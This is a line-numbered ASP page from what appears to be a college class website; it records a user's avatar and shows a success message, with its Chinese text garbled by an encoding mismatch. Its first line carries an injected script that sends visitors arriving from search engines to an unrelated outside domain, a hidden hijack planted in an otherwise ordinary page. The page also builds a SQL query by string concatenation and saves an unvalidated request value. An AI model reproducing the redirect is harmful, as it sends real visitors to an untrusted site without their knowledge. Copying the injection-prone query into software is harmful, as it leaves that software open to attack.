d:\wwwroot\wuchunhua\ͨѶ¼\zlx\uploadnow2.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="chklogin.asp"-->
002: <!--#include file="conn.asp"-->
003:
004: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
005: "http://www.w3.org/TR/html4/loose.dtd">
006: <html>
007: <head>
008: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
009: <link href="../css.css" rel="stylesheet" type="text/css">
010: <title>ÆëÆë¹þ¶ûְҵѧԺ¼ÆÈí052--Ïà²á</title>
011: <style type="text/css">
012: <!--
013: .style3 {font-size: 1pt;
014:    color: #FFFFFF;
015: }
016: .ziti {font-family: "ËÎÌå";
017:    font-size: 12px;
018:    font-weight: bold;
019:    color: #FFFFFF;
020: }
021: .ziti1 {font-size: 12px;
022:    font-weight: normal;
023:    color: #000000;
024: }
025: .ziti2 {font-family: "ËÎÌå";
026:    font-size: 12px;
027:    font-weight: bold;
028:    color: #FFFFFF;
029: }
030: .ziti2 {   font-family: "ËÎÌå";
031:    font-size: 12px;
032:    font-weight: normal;
033:    color: #000000;
034: }
035: .style5 {
036:    color: #000000;
037:    font-size: 12px;
038: }
039: body {
040:    background-image: url('../pic/xian.jpg');
041: }
042: -->

043: </style>
044: <%
045: dim rs
046: dim sql
047:
048: set rs=server.createobject("adodb.recordset")
049: sql="select * from [user] where name='" + Session("name") + "'"
050: rs.open sql,conn,1,3
051:
052: If rs.bof or rs.eof Then
053:   rs.close
054:   set rs=nothing
055:   Response.Redirect "../error.asp?id=ûÓÐÕâ¸öÓû§£¡"
056: Else
057: rs("pic")=Request("pic")
058: rs.update
059: rs.close
060: set rs=nothing
061: conn.close
062: set conn=nothing
063: End if
064: %
>
065:
066:
067: </head>
068:
069: <body>
070: <table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
071:   <tr>
072:     <th scope="col"><table width="775" border="0" cellspacing="0" cellpadding="0">
073:         <tr>
074:           <th scope="col">
075:           <img src="../pic/toplogo.jpg" width="775" height="80"></th>
076:         </tr>
077:         <tr>
078:           <td height="2"><span class="style3">1</span></td>
079:         </tr>
080:         <tr>
081:           <td height="20" background="../pic/tiao1.gif"><table width="775" border="0" cellpadding="0" cellspacing="0">
082:               <tr class="ziti">
083:                 <th scope="col"><a href="../logined.asp">Ê×Ò³</a></th>
084:                 <th scope="col"><a href="../photo/photo.asp">Ïà²á</a></th>
085:                 <th scope="col"><a href="../liuyanban/liuyan.asp">ÁôÑÔ±¾</a></th>
086:                 <th scope="col"><a href="../xys/">ÐíÔ¸°å</a></th>
087:                 <th scope="col"><a href="../xiaozhitiao/xiaozhitiao1.asp">ÇÄÇÄ»°</a></th>
088:                 <th scope="col"><a href="../zlx/zlx.asp">×ÊÁÏÏ»</a></th>
089:                 <th scope="col">¹ÜÀí</th>
090:                 <th scope="col"><a href="../denglu/denglu.asp">µÇ½</a></th>
091:               </tr>
092:           </table></td>
093:         </tr>
094:     </table></th>
095:   </tr>
096:   <tr>
097:     <td height="180" align="center" valign="top"><table width="775" height="219" border="0" cellpadding="0" cellspacing="0">
098:       <tr>
099:         <th width="20" scope="col">¡¡</th>
100:         <th scope="col">¡¡<table width="735" height="224" border="0" cellpadding="0" cellspacing="0">
101:           <tr>
102:             <th height="184" scope="col" valign="top" class=ziti2>
103:     <br>
104:     <span style="font-size: 15pt">Í·ÏñÌí¼Ó³É¹¦£¡</span><p>
105:     <span style="font-size: 15pt"><a href="photo.asp">
106:     <span style="font-weight: 400"><font color="#000000">
107:     <a href="../logined.asp"><font color="#000000">[·µ»ØÊ×Ò³]</font></a></font></span></a></span></th>
108:           </tr>
109:           <tr>
110:             <td height="40">¡¡</td>
111:           </tr>
112:         </table></th>
113:         <th width="20" scope="col">¡¡</th>
114:       </tr>
115:     </table></td>
116:   </tr>
117:   <tr>
118:     <td height="20" valign="bottom">¡¡</td>
119:   </tr>
120:   <tr>
121:     <td height="33"><hr>
122:         <div align="center"><span class="ziti1">°æÈ¨ËùÓÐ &copy ÆëÆë¹þ¶ûְҵѧԺ¼ÆËã»úÈí¼þ052°à</span></div></td>
123:   </tr>
124: </table>
125: </body>
126: </html>
127:
128: